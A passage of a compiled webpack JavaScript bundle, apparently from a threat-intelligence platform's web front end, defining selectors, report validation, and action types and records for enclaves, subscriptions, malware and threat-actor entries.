  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(redactionTermsTextMap, function (map) {
    return map.has(Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["toLower"])(text));
  });
};

var redactionTermSeq = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(redactionTerms, function (redactionTerms) {
  return redactionTerms.valueSeq();
});

var truncatedCategoryList = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(redactionTermSeq, function (redactionTermSeq) {
  return __WEBPACK_IMPORTED_MODULE_2__constants_js__["j" /* redactionCategories */].map(function (cat) {
    return cat.set('terms', redactionTermSeq.filter(function (redactionTerm) {
      return redactionTerm.get('categoryId') === cat.get('id');
    }));
  }).toList().map(function (cat) {
    return cat.update('terms', function (t) {
      return t.sort(function (a, b) {
        return Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["toLower"])(a.get('text')).localeCompare(Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["toLower"])(b.get('text')));
      });
    });
  });
});

/**
 * The category lists also includes the number of terms for each category. In
 * this way it is not exactly representative of the categories list returned
 * from the server on fetch.
 */
var categoryList = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(redactionTerms, function (redactionTerms) {
  return __WEBPACK_IMPORTED_MODULE_2__constants_js__["j" /* redactionCategories */].map(function (cat) {
    return cat.set('terms', redactionTerms.filter(function (redactionTerm) {
      return redactionTerm.get('categoryId') === cat.get('id');
    }));
  }).toList();
});

/**
 * Build a Map of category names and their assocated terms so that we can
 * redact them from all report content.
 *
 * NOTE: The returned Map does not necessarily have a one-to-one mapping with
 * all categories. Only categories for which there is at least one term will be
 * added. So if there is only one term in the entire app then only one key will
 * be created with Map of one term as the value.
 */
var redactionMap = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(redactionTerms, function (redactionTerms) {
  return redactionTerms.map(function (redactionTerm) {
    if (redactionTerm.get('categoryId')) {
      var category = __WEBPACK_IMPORTED_MODULE_2__constants_js__["j" /* redactionCategories */].getIn([redactionTerm.get('categoryId', ''), 'name'], '');
      return redactionTerm.set('categoryName', Object(__WEBPACK_IMPORTED_MODULE_2__constants_js__["g" /* hyphenate */])(category));
    }
    return redactionTerm;
  }).sort(function (c, d) {
    var lengthC = c.get('text').length;
    var lengthD = d.get('text').length;

    if (lengthC === lengthD) return 0;else if (lengthC > lengthD) return -1;else return 1;
  }).valueSeq();
});

/* The status of ther current term import. */
var redactablesMap = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([redactables, allRedactables], function (redactables, allRedactables) {
  var allRedactablesText = allRedactables.map(function (v) {
    return v.get('text');
  });
  return redactables.filter(function (v) {
    return allRedactablesText.contains(v.get('text'));
  }).toList();
});

/***/ }),
/* 711 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return toJSON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return validateReportContent; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return getValidationError; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return validateReportError; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Form; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return toForm; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment_timezone__ = __webpack_require__(214);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment_timezone___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_moment_timezone__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__constants_js__ = __webpack_require__(561);







var debug = __WEBPACK_IMPORTED_MODULE_5_debug___default()('app:modules:create:actions'); // eslint-disable-line no-unused-vars




/* Map a string of attributes to { name } attribute objects. */
var mapAttributes = function mapAttributes(attributes) {
  return __WEBPACK_IMPORTED_MODULE_4_trustar_fp__["IO"].of(attributes).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["map"])(function (v) {
    return { name: v };
  })) // The format the server wants
  .map(function (arr) {
    return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(arr);
  }).foldOr(function (err) {
    return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])([]);
  });
}; // Default to list

var mapEnclaves = function mapEnclaves(report, getState) {
  var userEnclaves = __WEBPACK_IMPORTED_MODULE_6_modules_profile__["getters"].enclaves(getState());
  // TODO: Should we remove this piece of code?
  if (report.get('distributionType') === 'COMMUNITY') {
    var enclaves = userEnclaves.toList();
    return report.get('id') ? enclaves.filter(function (e) {
      return e.get('create') || e.get('update');
    }) : enclaves.filter(function (e) {
      return e.get('create');
    });
  } else {
    return __WEBPACK_IMPORTED_MODULE_4_trustar_fp__["IO"].of(report).map(function (x) {
      return x.get('enclaves').map(function (enclaveId) {
        return userEnclaves.get(enclaveId);
      });
    }).foldOr(function (err) {
      debug('Error getting enclaves for report submission', err);
      return [];
    });
  }
};

/* Map a report to the format the server is expecting for submission. */


/* NOTE: If the user specifies "Time Unknown", or doesn't explicitly specify the time,
 * we default the time to the current moment the report is submitted to Station.
 */
var defaultTime = function defaultTime() {
  return Date.now();
};

var toJSON = function toJSON(report, getState) {
  return {
    title: report.get('title'),
    tags: report.get('tags', []).map(function (tag) {
      return { name: tag };
    }),
    reportBody: report.getIn(['content', 'data']),
    distributionType: report.get('distributionType'),
    enclaveGuid: report.get('enclaveGuid'),
    externalTrackingId: report.get('externalTrackingId', null),
    timeBegan: report.get('timeBeganUnknown') ? defaultTime() : __WEBPACK_IMPORTED_MODULE_0_moment_timezone___default.a.tz(report.get('timeBegan') || defaultTime(), report.get('timeBeganTimezone')).format(__WEBPACK_IMPORTED_MODULE_7__constants_js__["f" /* JAVA_DATE_FORMAT */])
  };
};

/* Validate report settings before submission */
var validateSubmit = function validateSubmit(report) {
  var title = report.get('title').trim();
  var enclaveGuid = report.get('enclaveGuid');
  var distributionType = report.get('distributionType');
  var reportBody = report.getIn(['content', 'data']);

  if (!title) {
    return 'Report must have a title.';
  }

  if (title.length > __WEBPACK_IMPORTED_MODULE_7__constants_js__["g" /* MAX_SUBJECT_LENGTH */]) {
    return 'Report title must be less than ' + __WEBPACK_IMPORTED_MODULE_7__constants_js__["g" /* MAX_SUBJECT_LENGTH */] + ' characters.';
  }

  if (!reportBody) {
    return 'Report must have a body. Please attach a file or paste text.';
  }

  if (!enclaveGuid && distributionType === 'ENCLAVE') {
    return 'You must select an enclave to submit to.';
  }

  return '';
};

/* Validate report content before moving to 'review' stage */
var validateReportContent = function validateReportContent(report) {
  var title = report.get('title').trim();
  var reportBody = report.getIn(['content', 'data']);

  if (!title) {
    return 'Report must have a title.';
  }

  if (title.length > __WEBPACK_IMPORTED_MODULE_7__constants_js__["g" /* MAX_SUBJECT_LENGTH */]) {
    return 'Report title must be less than ' + __WEBPACK_IMPORTED_MODULE_7__constants_js__["g" /* MAX_SUBJECT_LENGTH */] + ' characters.';
  }

  if (!reportBody) {
    return 'Report must have a body. Please attach a file or paste text.';
  }

  return '';
};

var getValidationError = function getValidationError(_ref) {
  var report = _ref.payload;

  return validateSubmit(report);
};

var validateReportError = function validateReportError(_ref2) {
  var report = _ref2.payload;

  return report.get('id') ? '' : 'Report does not have an id. Cannot be updated.';
};

var Form = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Record"])({
  currentValues: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])()
});

var toForm = function toForm(k, v) {
  if (k === '') {
    return Form(v);
  } else if (Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["isMapLike"])(v)) {
    return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])(v);
  } else if (Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["isListLike"])(v)) {
    return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])(v);
  } else {
    return v;
  }
};

/***/ }),
/* 712 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PENDING", function() { return PENDING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ACTIVE", function() { return ACTIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Options", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DataFeed", function() { return DataFeed; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var PENDING = 'PENDING';
var ACTIVE = 'ACTIVE';

var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  sortBy: 'name',
  sortOrder: 'DESC'
});

var DataFeed = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: null,
  name: '',
  credentialsType: '',
  description: '',
  maximumAccess: '',
  iconUrl: '',
  externalUrl: '',
  label: '',
  created: null,
  updated: null
});

/***/ }),
/* 713 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return REPROCESS_REPORTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return REPROCESS_REPORTS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return REPROCESS_REPORTS_FAILURE; });
/* unused harmony export REINDEX_BY_DATE */
/* unused harmony export REINDEX_BY_DATE_SUCCESS */
/* unused harmony export REINDEX_BY_DATE_FAILURE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return SET_REINDEX_OPTIONS; });
var prefix = function prefix(str) {
  return 'station/devtasks/' + str;
};

var REPROCESS_REPORTS = prefix('REPROCESS_REPORTS');
var REPROCESS_REPORTS_SUCCESS = prefix('REPROCESS_REPORTS_SUCCESS');
var REPROCESS_REPORTS_FAILURE = prefix('REPROCESS_REPORTS_FAILURE');

var REINDEX_BY_DATE = prefix('REINDEX_BY_DATE');
var REINDEX_BY_DATE_SUCCESS = prefix('REINDEX_BY_DATE_SUCCESS');
var REINDEX_BY_DATE_FAILURE = prefix('REINDEX_BY_DATE_FAILURE');

var SET_REINDEX_OPTIONS = prefix('SET_REINDEX_OPTIONS');

/***/ }),
/* 714 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveTemplate", function() { return saveTemplate; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveEnclaveTemplateIcon", function() { return saveEnclaveTemplateIcon; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteTemplate", function() { return deleteTemplate; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDisplayOptions", function() { return setDisplayOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(344);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(498);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__icons_action_types__ = __webpack_require__(177);





var debug = __WEBPACK_IMPORTED_MODULE_1_debug___default()('app:modules:templates:actions'); // eslint-disable-line no-unused-vars





/**
 * Fetch all enclaves that the user has access to. This means that TruSTAR admin
 * users will receive all enclaves, and everyone else will have access to only
 * the enclaves they has access to as a user.
 */
var fetch = function fetch() {
  var payload = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getQueryParams"])();
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH */],
    payload: payload
  };
};

/**
 * Save an enclave template
 */
var saveTemplate = function saveTemplate(template) {
  var marketplaceImageFile = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : null;
  var sourceSVGFile = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : null;
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* SAVE */],
    payload: template,
    meta: {
      file: marketplaceImageFile,
      sourceSVGFile: sourceSVGFile
    }
  };
};

var saveEnclaveTemplateIcon = function saveEnclaveTemplateIcon(enclaveGuid, file) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_4__icons_action_types__["d" /* SAVE_TEMPLATE_ICON */],
    payload: {
      guid: enclaveGuid,
      file: file
    }
  };
};

/**
 * Delete enclave template by id
 */
var deleteTemplate = function deleteTemplate(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* DELETE */],
    payload: id
  };
};

/**
 * Set display options. Determines sorting and filtering of Enclaves displayed to admins.
 */
var setDisplayOptions = function setDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

/***/ }),
/* 715 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_ENTITY_TYPES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_ENTITY_TYPES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_ENTITY_TYPES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_CREDENTIALS_TYPES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_CREDENTIALS_TYPES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_CREDENTIALS_TYPES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FETCH_ACCESS_TYPES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_ACCESS_TYPES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_ACCESS_TYPES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH_LABELS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return FETCH_LABELS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return FETCH_LABELS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return FETCH_SUBSCRIPTION_METHODS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return FETCH_SUBSCRIPTION_METHODS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return FETCH_SUBSCRIPTION_METHODS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return TOGGLE_ENTITY_TYPE; });
var prefix = function prefix(str) {
  return 'station/miscellaneous/' + str;
};

var FETCH_ENTITY_TYPES = prefix('FETCH_ENTITY_TYPES');
var FETCH_ENTITY_TYPES_SUCCESS = prefix('FETCH_ENTITY_TYPES_SUCCESS');
var FETCH_ENTITY_TYPES_FAILURE = prefix('FETCH_ENTITY_TYPES_FAILURE');

var FETCH_CREDENTIALS_TYPES = prefix('FETCH_CREDENTIALS_TYPES');
var FETCH_CREDENTIALS_TYPES_SUCCESS = prefix('FETCH_CREDENTIALS_TYPES_SUCCESS');
var FETCH_CREDENTIALS_TYPES_FAILURE = prefix('FETCH_CREDENTIALS_TYPES_FAILURE');

var FETCH_ACCESS_TYPES = prefix('FETCH_ACCESS_TYPES');
var FETCH_ACCESS_TYPES_SUCCESS = prefix('FETCH_ACCESS_TYPES_SUCCESS');
var FETCH_ACCESS_TYPES_FAILURE = prefix('FETCH_ACCESS_TYPES_FAILURE');

var FETCH_LABELS = prefix('FETCH_LABELS');
var FETCH_LABELS_SUCCESS = prefix('FETCH_PATTERNS_SUCCESS');
var FETCH_LABELS_FAILURE = prefix('FETCH_PATTERNS_FAILURE');

var FETCH_SUBSCRIPTION_METHODS = prefix('FETCH_SUBSCRIPTION_METHODS');
var FETCH_SUBSCRIPTION_METHODS_SUCCESS = prefix('FETCH_SUBSCRIPTION_METHODS_SUCCESS');
var FETCH_SUBSCRIPTION_METHODS_FAILURE = prefix('FETCH_SUBSCRIPTION_METHODS_FAILURE');

var TOGGLE_ENTITY_TYPE = prefix('TOGGLE_ENTITY_TYPE');

/***/ }),
/* 716 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FETCH_SUBSCRIPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_SUBSCRIPTIONS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_SUBSCRIPTIONS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return UNSUBSCRIBE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return UNSUBSCRIBE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return UNSUBSCRIBE_FAILURE; });
var prefix = function prefix(str) {
  return 'station/subscriptions/' + str;
};

var FETCH_SUBSCRIPTIONS = prefix('FETCH_SUBSCRIPTIONS');
var FETCH_SUBSCRIPTIONS_SUCCESS = prefix('FETCH_SUBSCRIPTIONS_SUCCESS');
var FETCH_SUBSCRIPTIONS_FAILURE = prefix('FETCH_SUBSCRIPTIONS_FAILURE');

var UNSUBSCRIBE = prefix('UNSUBSCRIBE');
var UNSUBSCRIBE_SUCCESS = prefix('UNSUBSCRIBE_SUCCESS');
var UNSUBSCRIBE_FAILURE = prefix('UNSUBSCRIBE_FAILURE');

/***/ }),
/* 717 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return MARKETPLACE_ENDPOINT; });
/* unused harmony export TEMPLATES_ENDPOINT */
/* unused harmony export PENDING */
/* unused harmony export ACTIVE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ManagedSubscription; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var MARKETPLACE_ENDPOINT = '/services/subscriptions';
var TEMPLATES_ENDPOINT = '/services/enclave-templates';
var PENDING = 'PENDING';
var ACTIVE = 'ACTIVE';

var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  sortBy: 'name',
  sortOrder: 'DESC'
});

var ManagedSubscription = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  feedGuid: null,
  name: '',
  iconUrl: '',
  description: '',
  publicEnclave: false,
  credentialsType: '',
  maximumAccess: '',
  state: null,
  companyGuid: null,
  companyName: null,
  enclaveGuid: null,
  externalUrl: null,
  label: null,
  createdBy: '',
  updatedBy: '',
  created: null,
  updated: null,
  lastPulled: null
});

/***/ }),
/* 718 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return SAVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return SAVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return EDIT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return EDIT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return EDIT_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DELETE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_FAILURE; });
var prefix = function prefix(str) {
  return 'station/groups/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var SAVE = prefix('SAVE');
var SAVE_SUCCESS = prefix('SAVE_SUCCESS');
var SAVE_FAILURE = prefix('SAVE_FAILURE');

var EDIT = prefix('EDIT');
var EDIT_SUCCESS = prefix('EDIT_SUCCESS');
var EDIT_FAILURE = prefix('EDIT_FAILURE');

var DELETE = prefix('DELETE');
var DELETE_SUCCESS = prefix('DELETE_SUCCESS');
var DELETE_FAILURE = prefix('DELETE_FAILURE');

/***/ }),
/* 719 */,
/* 720 */,
/* 721 */,
/* 722 */,
/* 723 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return UPDATE_PAGE_FILTERS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return RESET_PAGE_FILTERS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_MALWARE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_MALWARE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_MALWARE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return SAVE_MALWARE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SAVE_MALWARE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return SAVE_MALWARE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DELETE_MALWARE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_MALWARE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_MALWARE_FAILURE; });
var prefix = function prefix(str) {
  return 'station/malware/' + str;
};

var UPDATE_PAGE_FILTERS = prefix('UPDATE_PAGE_FILTERS');
var RESET_PAGE_FILTERS = prefix('RESET_PAGE_FILTERS');

var FETCH_MALWARE = prefix('FETCH_MALWARE');
var FETCH_MALWARE_SUCCESS = prefix('FETCH_MALWARE_SUCCESS');
var FETCH_MALWARE_FAILURE = prefix('FETCH_MALWARE_FAILURE');

var SAVE_MALWARE = prefix('SAVE_MALWARE');
var SAVE_MALWARE_SUCCESS = prefix('SAVE_MALWARE_SUCCESS');
var SAVE_MALWARE_FAILURE = prefix('SAVE_MALWARE_FAILURE');

var DELETE_MALWARE = prefix('DELETE_MALWARE');
var DELETE_MALWARE_SUCCESS = prefix('DELETE_MALWARE_SUCCESS');
var DELETE_MALWARE_FAILURE = prefix('DELETE_MALWARE_FAILURE');

/***/ }),
/* 724 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Options", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Malware", function() { return Malware; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  pageNumber: 0,
  pageSize: 25,
  sortBy: 'name',
  sortOrder: 'DESC'
});

var Malware = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: '',
  name: '',
  aliases: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(),
  created: null,
  createdBy: '',
  updated: null,
  updatedBy: ''
});

// Like payload action but also supports field to update

/***/ }),
/* 725 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return UPDATE_PAGE_FILTERS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return RESET_PAGE_FILTERS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_THREAT_ACTOR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_THREAT_ACTOR_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_THREAT_ACTOR_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return SAVE_THREAT_ACTOR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SAVE_THREAT_ACTOR_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return SAVE_THREAT_ACTOR_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DELETE_THREAT_ACTOR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_THREAT_ACTOR_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_THREAT_ACTOR_FAILURE; });
var prefix = function prefix(str) {
  return 'station/threat-actors/' + str;
};

var UPDATE_PAGE_FILTERS = prefix('UPDATE_PAGE_FILTERS');
var RESET_PAGE_FILTERS = prefix('RESET_PAGE_FILTERS');

var FETCH_THREAT_ACTOR = prefix('FETCH_THREAT_ACTOR');
var FETCH_THREAT_ACTOR_SUCCESS = prefix('FETCH_THREAT_ACTOR_SUCCESS');
var FETCH_THREAT_ACTOR_FAILURE = prefix('FETCH_THREAT_ACTOR_FAILURE');

var SAVE_THREAT_ACTOR = prefix('SAVE_THREAT_ACTOR');
var SAVE_THREAT_ACTOR_SUCCESS = prefix('SAVE_THREAT_ACTOR_SUCCESS');
var SAVE_THREAT_ACTOR_FAILURE = prefix('SAVE_THREAT_ACTOR_FAILURE');

var DELETE_THREAT_ACTOR = prefix('DELETE_THREAT_ACTOR');
var DELETE_THREAT_ACTOR_SUCCESS = prefix('DELETE_THREAT_ACTOR_SUCCESS');
var DELETE_THREAT_ACTOR_FAILURE = prefix('DELETE_THREAT_ACTOR_FAILURE');

/***/ }),
/* 726 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Options", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ThreatActor", function() { return ThreatActor; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  pageNumber: 0,
  pageSize: 25,
  sortBy: 'name',
  sortOrder: 'DESC'
});

var ThreatActor = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: '',
  name: '',
  aliases: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(),
  created: null,
  createdBy: '',
  updated: null,
  updatedBy: ''
});

// Like payload action but also supports field to update

/***/ }),
/* 727 */,
/* 728 */,
/* 729 */,
/* 730 */,
/* 731 */,
/* 732 */,
/* 733 */,
/* 734 */,
/* 735 */,
/* 736 */,
/* 737 */,
/* 738 */,
/* 739 */,
/* 740 */,
/* 741 */,
/* 742 */,
/* 743 */,
/* 744 */,
/* 745 */,
/* 746 */,
/* 747 */,
/* 748 */,
/* 749 */,
/* 750 */,
/* 751 */,
/* 752 */,
/* 753 */,
/* 754 */,
/* 755 */,
/* 756 */,
/* 757 */,
/* 758 */
